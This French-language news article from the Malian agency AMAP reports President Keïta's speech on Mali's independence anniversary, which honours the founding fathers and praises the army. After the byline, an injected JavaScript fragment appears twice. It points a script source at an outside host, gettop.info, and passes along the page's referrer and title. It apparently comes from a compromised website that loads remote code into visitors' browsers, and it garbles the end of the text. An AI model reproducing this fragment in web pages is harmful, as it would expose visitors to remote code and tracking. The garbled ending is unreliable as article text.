22 septembre : un jour d’espérance et de devoir de mémoire

Bamako.23 septembre (AMAP) Le président Ibrahim Boubacar Keita a estimé vendredi et défendu dans une déclaration faite à l’occasion du 57e anniversaire de l’accession du Mali à la souveraineté internationale que le peuple malien a droit d’espérer et d’avoir de plus grandes espérances.

« Quand un peuple a été si grand dans l’histoire, quand un peuple demeure aussi résilient dans l’épreuve et dans la douleur, il est permis à ce peuple des plus grandes espérances » a déclaré le président Keïta.

IBK qui a rendu hommage aux pères de l’indépendance par le dépôt d’une gerbe de fleurs au bas du monument érigé en leur honneur, a dit sa perception et le sens à donner à l’évènement.

« Au delà du formel, c’est toujours l’occasion de replonger dans la mémoire de notre peuple, de savoir le sens véritable du 22 septembre 1960, jour du recouvrement de notre indépendance afin que nous décidions de notre destin dans la liberté ».

Le chef de l’État, chef suprême des armées a, par la même occasion, réaffirmé sa confiance en l’armée nationale et exprimé sa fierté de la servir pour être à hauteur de mission.

Malgré qu’elle ait été « malmenée » et parfois victime de trahison, l’armée malienne tient bon encore, a laissé comprendre IBK.

« Armée malienne, vous êtes notre fierté, notre raison de nous battre, allant, revenant « pour mettre en place « les moyens  de votre mission au nom du Mali vous permettant de la conduire de la plus belle manière ».

MS  (AMAP)s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »;

Laisser un commentaire